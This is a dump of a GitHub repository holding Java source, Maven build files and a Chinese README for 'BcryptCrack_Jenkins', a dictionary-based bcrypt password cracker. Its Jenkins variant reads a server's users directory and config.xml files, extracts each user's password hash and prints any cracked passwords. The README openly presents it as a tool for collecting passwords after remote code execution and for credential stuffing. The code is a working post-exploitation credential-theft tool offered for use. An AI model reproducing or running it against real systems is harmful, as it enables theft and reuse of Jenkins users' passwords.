├── BcryptCrack ├── BcryptCrack-1.0-SNAPSHOT.jar ├── BcryptCrack.iml ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── cat │ └── bc │ └── BcryptCrack.java ├── BcryptCrack_Jenkins ├── BcryptCrack.iml ├── BcryptCrack_Jenkins-1.0-SNAPSHOT.jar ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── cat │ └── bc │ ├── BcryptCrack.java │ └── GetXML.java └── README.md /BcryptCrack/BcryptCrack-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rabbitmask/BcryptCrack_Jenkins/59b3816c4a1b980bbcb5d9ac01bff4d2275c0a70/BcryptCrack/BcryptCrack-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /BcryptCrack/BcryptCrack.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BcryptCrack/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | BcryptCrack 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.mindrot 15 | jbcrypt 16 | 0.4 17 | 18 | 19 | 20 | 21 | 22 | 23 | org.apache.maven.plugins 24 | maven-shade-plugin 25 | 1.2.1 26 | 27 | 28 | package 29 | 30 | shade 31 | 32 | 33 | 34 | 36 | com.cat.bc.BcryptCrack 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 8 48 | 8 49 | 50 | 51 | -------------------------------------------------------------------------------- /BcryptCrack/src/main/java/com/cat/bc/BcryptCrack.java: -------------------------------------------------------------------------------- 1 | package com.cat.bc; 2 | 3 | import org.mindrot.jbcrypt.BCrypt; 4 | 5 | import java.io.IOException; 6 | import java.nio.file.Files; 7 | import java.nio.file.Paths; 8 | import java.util.ArrayList; 9 | import java.util.List; 10 | import java.util.Scanner; 11 | 12 | 13 | public class BcryptCrack { 14 | public static void main(String[] args) { 15 | 16 | Scanner h = new Scanner(System.in); 17 | System.out.print("请输入您的密文："); 18 | String hashed = h.nextLine(); 19 | 20 | Scanner p = new Scanner(System.in); 21 | System.out.print("请提供您的字典："); 22 | String Pass_Path = p.nextLine(); 23 | 24 | List pass = readTxt(Pass_Path); 25 | 26 | getPass(hashed,pass); 27 | 28 | } 29 | 30 | 31 | public static void getPass(String hashed, List pass) { 32 | assert pass != null; 33 | for (Object o : pass) { 34 | if (BCrypt.checkpw((String) o, hashed)) { 35 | System.out.println("破解成功:" + o); 36 | break; 37 | } 38 | } 39 | } 40 | 41 | //读取TXT返回列表形式 42 | public static List readTxt(String filePath) { 43 | List fileList = new ArrayList<>(); 44 | try { 45 | fileList = Files.readAllLines(Paths.get(filePath)); 46 | } catch (IOException e) { 47 | e.printStackTrace(); 48 | } 49 | return fileList; 50 | } 51 | 52 | } 53 | 54 | 55 | -------------------------------------------------------------------------------- /BcryptCrack_Jenkins/BcryptCrack.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BcryptCrack_Jenkins/BcryptCrack_Jenkins-1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rabbitmask/BcryptCrack_Jenkins/59b3816c4a1b980bbcb5d9ac01bff4d2275c0a70/BcryptCrack_Jenkins/BcryptCrack_Jenkins-1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /BcryptCrack_Jenkins/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | BcryptCrack 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.mindrot 15 | jbcrypt 16 | 0.4 17 | 18 | 19 | 20 | org.apache.commons 21 | commons-lang3 22 | 3.11 23 | 24 | 25 | 26 | dom4j 27 | dom4j 28 | 1.6.1 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | org.apache.maven.plugins 38 | maven-shade-plugin 39 | 1.2.1 40 | 41 | 42 | package 43 | 44 | shade 45 | 46 | 47 | 48 | 50 | com.cat.bc.BcryptCrack 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 8 62 | 8 63 | 64 | 65 | -------------------------------------------------------------------------------- /BcryptCrack_Jenkins/src/main/java/com/cat/bc/BcryptCrack.java: -------------------------------------------------------------------------------- 1 | package com.cat.bc; 2 | 3 | 4 | import org.mindrot.jbcrypt.BCrypt; 5 | 6 | import java.io.IOException; 7 | import java.nio.file.Files; 8 | import java.nio.file.Paths; 9 | import java.util.*; 10 | 11 | 12 | public class BcryptCrack { 13 | 14 | 15 | public static void main(String[] args) { 16 | 17 | 18 | Scanner u = new Scanner(System.in); 19 | System.out.print("请提供 JENKINS_HOME/users 目录："); 20 | String Users_Path = u.nextLine(); 21 | 22 | Scanner p = new Scanner(System.in); 23 | System.out.print("请提供您的字典："); 24 | String Pass_Path = p.nextLine(); 25 | 26 | List pass = readTxt(Pass_Path); 27 | 28 | Map usermap = getUserMap(Users_Path); 29 | 30 | for (String key : usermap.keySet()) { 31 | try { 32 | String passwordHash=getUserHashed(Users_Path,usermap.get(key)); 33 | getPass(key,passwordHash,pass); 34 | } catch (Exception e) { 35 | // e.printStackTrace(); 36 | } 37 | 38 | } 39 | 40 | } 41 | 42 | public static String getUserHashed(String Users_Path,String userConfigName) { 43 | String xml = null; 44 | try { 45 | xml = GetXML.LoadContentByPath(Users_Path+"\\"+userConfigName+"\\config.xml"); 46 | } catch (IOException e) { 47 | // e.printStackTrace(); 48 | } 49 | List passwordHash =GetXML.getFieldListByRegex(xml,"passwordHash"); 50 | return (passwordHash.get(0).replace("#jbcrypt:","")); 51 | 52 | } 53 | 54 | 55 | public static Map getUserMap(String Users_Path){ 56 | String xml = null; 57 | try { 58 | xml = GetXML.LoadContentByPath(Users_Path+"\\users.xml"); 59 | } catch (IOException e) { 60 | e.printStackTrace(); 61 | } 62 | List user_hashed =GetXML.getFieldListByRegex(xml,"string"); 63 | Map m = new HashMap<>(); 64 | 65 | for(int i=0;i pass) { 74 | assert pass != null; 75 | for (Object o : pass) { 76 | if (BCrypt.checkpw((String) o, hashed)) { 77 | System.out.println(user+"：" + o); 78 | break; 79 | } 80 | } 81 | } 82 | 83 | 84 | public static List readTxt(String filePath) { 85 | List fileList = new ArrayList<>(); 86 | try { 87 | fileList = Files.readAllLines(Paths.get(filePath)); 88 | } catch (IOException e) { 89 | e.printStackTrace(); 90 | } 91 | return fileList; 92 | } 93 | 94 | 95 | } 96 | 97 | 98 | -------------------------------------------------------------------------------- /BcryptCrack_Jenkins/src/main/java/com/cat/bc/GetXML.java: -------------------------------------------------------------------------------- 1 | package com.cat.bc; 2 | 3 | import org.apache.commons.lang3.StringUtils; 4 | 5 | import java.io.*; 6 | import java.util.ArrayList; 7 | import java.util.List; 8 | import java.util.regex.Matcher; 9 | import java.util.regex.Pattern; 10 | 11 | 12 | public class GetXML { 13 | 14 | public static String LoadContentByPath(String path) throws IOException { 15 | InputStream is = new FileInputStream(path); 16 | BufferedReader in = new BufferedReader(new InputStreamReader(is)); 17 | StringBuilder buffer = new StringBuilder(); 18 | String line = ""; 19 | while ((line = in.readLine()) != null){ 20 | buffer.append(line); 21 | } 22 | return buffer.toString(); 23 | 24 | } 25 | 26 | public static List getFieldListByRegex(String xml, String label) { 27 | //正则表达式 28 | String regex = "<" + label + ">(.*?)"; 29 | Pattern pattern = Pattern.compile(regex); 30 | Matcher m = pattern.matcher(xml); 31 | //匹配的有多个 32 | List fieldList = new ArrayList<>(); 33 | while (m.find()) { 34 | if (StringUtils.isNotEmpty(m.group(1).trim())) { 35 | fieldList.add(m.group(1).trim()); 36 | } 37 | } 38 | return fieldList; 39 | } 40 | 41 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BcryptCrack_Jenkins 2 | 3 | 针对于Jenkins控制台用户的暴力破解工具 4 | 5 | 适用场景：RCE之后的密码收集、撞库等 6 | 7 | ### Demo: 8 | ``` 9 | java -jar BcryptCrack_Jenkins-1.0-SNAPSHOT.jar 10 | 请提供 JENKINS_HOME/users 目录： 11 | 请提供您的字典： 12 | ``` 13 | --------------------------------------------------------------------------------